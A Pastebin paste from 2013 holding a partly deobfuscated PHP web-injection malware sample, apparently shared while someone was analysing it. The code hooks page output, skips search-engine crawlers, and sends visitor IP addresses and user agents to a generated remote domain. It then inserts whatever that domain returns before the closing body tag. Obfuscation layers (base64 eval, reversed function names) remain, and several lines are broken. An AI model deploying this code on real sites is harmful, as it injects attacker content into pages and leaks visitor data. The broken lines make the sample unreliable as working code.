API tools faq
paste
Advertisement
cephurs

decode

cephurs
Aug 1st, 2013
1,207
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.81 KB | None | 0 0
raw download clone embed print report diff
  1. googlefu came up with this:
  2.  
  3. <?php
  4.  
  5. /* Decoded by unphp.net */
  6.  
  7. $eva1fY2bak1cz0ir = "function_exists";
  8. $eva1fY2bal1cz0ir = "ob_start";
  9. $eva1fY2bal1cz8ir = "codex22";
  10.  
  11. if (function_exists("ob_start") && !isset($GLOBALS["codex22"])) {
  12.     $GLOBALS["codex22"] = 1;
  13.  
  14.     if (!function_exists("eva1fY2bak1cV2ir")) {
  15.  
  16.         if (!function_exists("main_code")) {
  17.             function main_code() {
  18.                 //echo start
  19.                 if (!isset($GLOBALS["aghex0"])) {
  20.                     $GLOBALS["aghex0"] = 1;
  21.                     $url_contents = "";
  22.                     if (!isset($code_block)) {
  23.                        
  24.                         // preg_replace($code_array[2], $code_array[1], strrev($code_array[0]));
  25.                         // preg_replace("@(.+)@ie", "eval("");", "@eval(base64_decode($code_block_parts[1]));");
  26.                         // eval(base64_decode($code_block_parts[1])
  27.                        
  28.                         // Original variable names
  29.                         $code_block = "7kyJ7kSKi..."; // Truncated
  30.                         $eva1fYlbakBcVSir = $code_block;
  31.                         $eva1tYlbakBcVSir = "edolpxe";
  32.                         $eva1tYldakBcVSir = "strrev";
  33.                         $eva1tYldakBoVS1r = "ecalper_gerp";
  34.                         $eva1tYidokBoVSjr = ";))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("");:@(.+)@ie";
  35.                         $eva1tYldokBcVSjr = strrev($eva1tYldakBoVS1r); // preg_replace
  36.                         $eva1tYldakBcVSjr = strrev($eva1tYlbakBcVSir); // explode()
  37.  
  38.                         $eva1tYidakBcVSjr = explode('+', $code_block);
  39.                         $code_block_parts = $eva1tYidakBcVSjr;
  40.                        
  41.                         $eva1tYXdakAcVSjr = $code_block_parts[0];
  42.  
  43.                         $code_array = $eva1tYidokBcVSjr = array(
  44.                             ";))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@",
  45.                             "eval("");",
  46.                             "@(.+)@ie"
  47.                         );
  48.  
  49.  
  50.                         if (!isset($evalUdCXTDQERmWnDS)) {
  51.  
  52.                             function custom_strrev($s) {
  53.                                 $e = "";
  54.                                 for ($a = 0; $a <= strlen($s) - 1; $a++) {
  55.                                     $e. = $s {
  56.                                         strlen($s) - $a - 1
  57.                                     };
  58.                                 }
  59.                                 return ($e);
  60.                             }
  61.  
  62.                             $evallwhVfIVnWPbT = 'custom_strrev';
  63.                             $evalMNhPOlTagIOfBSF = 'base64_decode';
  64.  
  65.                             $evalamSEiYUdCgdSW = "stats";
  66.                             $evalTWeirVaqVW = "http";
  67.                             $evalBdUbtGUDXfB = 'in';
  68.                             $evalQwblCenFzUe = '!go!';
  69.                             $evalrMsivpMgcfC = $_SERVER['HTTP_USER_AGENT'];
  70.  
  71.                             // eval(base64_decode(strrev($eva1tYXdakAcVSjr)));
  72.                             $fif25 = "@(.+)@i";
  73.                             $fif52 = 'eval("\1");';
  74.                             $fit52 = '@eval(base64_decode("';
  75.                             $retarn='preg_replace';
  76.                             $retun='create_function';
  77.                             $retrun='retrun';
  78.  
  79.  
  80.  
  81.                             function retrun($return) {
  82.                                 $funciton = create_function("&$"."function","$"."function = chr(ord($"."function)-3);");
  83.                                 $return = str_split($return);
  84.                                 array_walk($return, $funciton);
  85.                                 return base64_decode(implode("",$return));
  86.                             }
  87.  
  88.                             // Renamed to get_domain()
  89.                             // function dd0(){
  90.                             //  $tsst52 = create_function('$return', 'return "web-".substr($return,0,3);');
  91.                             //  $tsst5 = create_function('$return', 'return md5($return);');
  92.                             //  $tsst51 = create_function('', 'return mt_rand(1-1,1+1);');
  93.                             //  $tsst512 = create_function('$create_function', 'return gethostbyname($create_function.".c"."a");');
  94.                             //  return $tsst5($tsst512($tsst52($tsst5($tsst51())))).".com";
  95.                             // }
  96.  
  97.                             function get_domain(){
  98.                                 $rand_md5 = md5(mt_rand(0, 2));
  99.                                 $web = "web-".substr($rand_md5,0,3);
  100.                                 $host_lookup = gethostbyname($create_function.".c"."a");
  101.                                 return md5($host_lookup);
  102.                             }
  103.                
  104.                             $user_agents = array(
  105.                                 "Google",
  106.                                 "Slurp",
  107.                                 "MSNBot",
  108.                                 "ia_archiver",
  109.                                 "Yandex",
  110.                                 "Rambler"
  111.                             );
  112.                             $evalTtDntGsohDPt = $user_agents; // Original variable name
  113.  
  114.                             eval(base64_decode("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
  115.                             $evalgKgHOXrDzX = get_domain(); // f528764d624db129b32c21fbca0cb8d6.com
  116.  
  117.                             if((preg_match("/".implode("|", $user_agents)."/i", $_SEVER['HTTP_USER_AGENT'])) or( isset($_COOKIE['stats']))) {
  118.                                 ;
  119.                             } else { @setcookie('stats', md5('status')), time() + 10800);
  120.                                
  121.                                 // URL Like:    
  122.                                 $url_contents = evalWEMBIkqYOIIGcLBn("http://". get_domain() .'/Din.php?i='.$_SERVER['REMOTE_ADDR'].'&b='.urlencode($_SEVER['HTTP_USER_AGENT']).'&h='.urlencode($_SERVER['HTTP_HOST']));
  123.                                
  124.                                 if (strstr($url_contents, '!go!')) {
  125.                                     $url_contents = explode('!go!', $url_contents);
  126.                                     $url_contents = $url_contents[1];
  127.                                 }
  128.                             }
  129.  
  130.                             $evalUdCXTDQERmWnDS = 18792;
  131.                         }
  132.  
  133.  
  134.                         $eva1tYldakBcVSir = "";
  135.                         $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
  136.                         $eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
  137.                         $eva1tYldakBcVSir = "strecrptr";
  138.                         $eva1tYlbakBcVSir = "gao[pxe";
  139.                         $eva1tYldakBoVS1r = "ecrp";
  140.                         $eva1tYldakBcVSir = "";
  141.                         $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
  142.                         $eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
  143.                     }
  144.                 }
  145.  
  146.                 return $url_contents;
  147.             }
  148.         }
  149.  
  150.         if (!$function_exists("gzdecode")) {
  151.  
  152.             function gzdecode($input_string) {
  153.                
  154.                 // Original variable names
  155.                 $eva1fY2bal1cz8i4 = "strpos";
  156.                 $eva1fY2bol1cz8i5 = "substr";
  157.                 $eva1fY2bo11cz8i5 = "unpack";
  158.                 $eva1fY2bo1lcz8i5 = "chr";
  159.                 $eva1fY2bo1lzc8i5 = "gzinflate";
  160.  
  161.                 $eva1fY2bo01zo317 = @ord(@substr($input_string, 3, 1));
  162.  
  163.                 $eva1fY2bo01c0317 = 10;
  164.                 if ($eva1fY2bo01zo317 & 4) {
  165.                     $eva1fY2bo01z0317 = @unpack('v', substr($input_string, 10, 2));
  166.                     $eva1fY2bo01z0317 = $eva1fY2bo01z0317[1];
  167.                     $eva1fY2bo01c0317 += 2 + $eva1fY2bo01z0317;
  168.                 }
  169.                 if ($eva1fY2bo01zo317 & 8) {
  170.                     $eva1fY2bo01c0317 = @strpos($input_string, chr(0), $eva1fY2bo01c0317) + 1;
  171.                 }
  172.                 if ($eva1fY2bo01zo317 & 16) {
  173.                     $eva1fY2bo01c0317 = @strpos($input_string, chr(0), $eva1fY2bo01c0317) + 1;
  174.                 }
  175.                 if ($eva1fY2bo01zo317 & 2) {
  176.                     $eva1fY2bo01c0317 += 2;
  177.                 }
  178.                 $output = @gzinflate(@substr($input_string, $eva1fY2bo01c0317));
  179.                 if ($output === FALSE) {
  180.                     $output = $input_string;
  181.                 }
  182.                 return $output;
  183.             }
  184.         }
  185.  
  186.         function initial_entry($input_string) {
  187.  
  188.             // Original variable names
  189.             $eva1fY2b01lzc8l5 = "preg_replace";
  190.             $eva1fY2b0llzc8l5 = "preg_match";
  191.             $eva1fY2b022zc8l5 = "Header";
  192.             $eva1fY2b022zo8l5 = "gzdecode";
  193.             $eva1fY2b052zo8l5 = "Content-Encoding: none";
  194.             $eva1fY2b052zo8l1 = "/\<\/body/si";
  195.             $eva1fY2b062zo8l1 = "/(\<\/body[^\>]*\>)/si";
  196.             $eva1fY2b061zo8l1 = "/\<\/html/si";
  197.             $eva1fY2bo61zo8l1 = "/(\<\/html[^\>]*\>)/si";
  198.  
  199.             header("Content-Encoding: none");
  200.  
  201.             $decoded = gzdecode($input_string);
  202.  
  203.             if (preg_match("/\<\/body/si", $decoded)) {
  204.                 return preg_replace("/(\<\/body[^\>]*\>)/si", main_code()."
  205. "."$1", $decoded, 1);
  206.             } else {
  207.                 if (preg_match("/\<\/html/si", $decoded)) {
  208.                     return preg_replace("/(\<\/html[^\>]*\>)/si", main_code()."
  209. "."$1", $decoded, 1);
  210.                 } else {
  211.                     return $decoded;
  212.                 }
  213.             }
  214.         }
  215.         $eva1fY2bo61zo817 = "ob_start";
  216.  
  217.         ob_start("initial_entry");
  218.     }
  219. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!